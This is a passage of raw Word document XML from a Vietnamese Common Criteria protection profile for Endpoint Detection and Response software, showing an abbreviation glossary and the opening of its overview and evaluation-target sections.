          <w:p w14:paraId="4C1802D8" w14:textId="6D674019" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5031EB30" w14:textId="4A90DF72" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Security Assurance Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26187EA9" w14:textId="46A4A6DD" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Yêu cầu đảm bảo an toàn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="3FEB934A" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E3FEBE2" w14:textId="2EF2D995" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>SF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1548FE24" w14:textId="39588601" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Security Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C4A7808" w14:textId="38902ED0" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Chức năng an toàn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="75FAA2A7" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B7E4331" w14:textId="7093DFAE" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SFR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45E48950" w14:textId="340087B9" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Security Functional Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B74AC15" w14:textId="6FB8C3C5" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Yêu cầu chức năng an toàn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="23F76BF3" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B3ED8C8" w14:textId="65155250" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="250F2ABA" w14:textId="6FE105D1" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Security Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51E6F2A4" w14:textId="457337D9" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="003D2FD0" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Mục tiêu</w:t>
            </w:r>
            <w:r w:rsidR="004D36D4" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> an toàn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="44753D28" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65F5121B" w14:textId="7F7CB3BB" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>TOE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05C484EE" w14:textId="4534D1BD" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Target of Evaluation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F2C603F" w14:textId="7E26D7A8" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="007612D9" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="32"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Đối tượng</w:t>
            </w:r>
            <w:r w:rsidR="004D36D4" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="03C4E9B3" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14989BC6" w14:textId="51AF1C84" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>TSF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D9CC389" w14:textId="45E5DAAE" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>TOE Security Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="420638FC" w14:textId="1E03202D" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Các chức năng an toàn của TOE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="1538A4F8" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04591F6F" w14:textId="78F62574" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>TSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A17A53D" w14:textId="1607BB72" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>TOE Summary Specification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="282B03AC" w14:textId="41AEB1E5" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Mô tả cấu hình TOE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="75B6380D" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4373575B" w14:textId="65EB81D8" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>TSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AEB198C" w14:textId="16E12BA4" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>TOE Security Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="683FE161" w14:textId="5753E2D5" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Chính sách an toàn TOE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D36D4" w:rsidRPr="00204C5F" w14:paraId="15F9A088" w14:textId="77777777" w:rsidTr="00801BD2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="786D30F8" w14:textId="4831DE52" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FFC82EC" w14:textId="3C2ABA91" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Virtual Private Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4227" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65374FB4" w14:textId="4E443127" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Mạng riêng ảo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60B8136D" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00251584" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc137476356"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00B1283F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Giới thiệu Hồ sơ bảo vệ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="40BF9A85" w14:textId="56099932" w:rsidR="00285288" w:rsidRPr="00204C5F" w:rsidRDefault="00285288" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc502652897"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.1 Tổng quan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0AFC2D" w14:textId="5BC6346D" w:rsidR="00285288" w:rsidRPr="00204C5F" w:rsidRDefault="00285288" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Phạm vi của Hồ sơ bảo vệ</w:t>
      </w:r>
      <w:r w:rsidR="007612D9" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> này</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PP-Module) mô tả chức năng bảo mật của hệ thống Phát hi</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ện và Phản hồi Điểm cuối (EDR) </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>áp dụng theo [CC] và xác định các yêu cầu chức năng, đảm bảo cho các sản phẩm này. Hồ sơ bảo vệ này được thiết</w:t>
      </w:r>
      <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> kế để sử dụng với Tiêu chuẩn quốc gia</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127949F4" w14:textId="5D79C751" w:rsidR="00285288" w:rsidRPr="00204C5F" w:rsidRDefault="008950B5" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- Tiêu chuẩn quốc gia TCVN 13468:2022 Công nghệ thông tin – Các kỹ thuật an toàn – Hồ sơ bảo vệ cho phần mềm ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3118B2DC" w14:textId="7053D50E" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00285288" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ồ sơ bảo vệ này</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> được chấp nhận là hợp lệ vì EDR được triển khai dưới dạng ứng dụng phần mềm trên hệ điều hành đa năng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0B12B" w14:textId="66E02BB5" w:rsidR="00DC449F" w:rsidRPr="00204C5F" w:rsidRDefault="00DC449F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mục tiêu đánh giá tuân thủ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205D16D4" w14:textId="164F5999" w:rsidR="00BA2AF5" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:right="-19"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:szCs w:val="28"/>
            <w:lang w:val="vi"/>
          </w:rPr>
          <w:t xml:space="preserve">EDR là phần mềm </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve">giám sát hoạt động </w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>thu thập từ</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> dữ liệu máy chủ điểm cuối để phát hiện </w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>hoạt động có khả năng trái phép</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên các điểm cuối, cho phép </w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>phát hiện</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> mối đe dọa và c</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> hành động ứng phó sự cố khác để khắc phục các hành vi độc hại. Những yêu cầu này bao gồm các đặc điểm và hành vi </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>đảm bảo an toàn</w:t>
      </w:r>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> cơ bản cho các sản phẩm </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:szCs w:val="28"/>
            <w:lang w:val="vi"/>
          </w:rPr>
          <w:t xml:space="preserve">EDR; </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> nền tảng </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="00DC449F" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:szCs w:val="28"/>
            <w:lang w:val="vi"/>
          </w:rPr>
          <w:t xml:space="preserve">mà EDR chạy </w:t>
        </w:r>
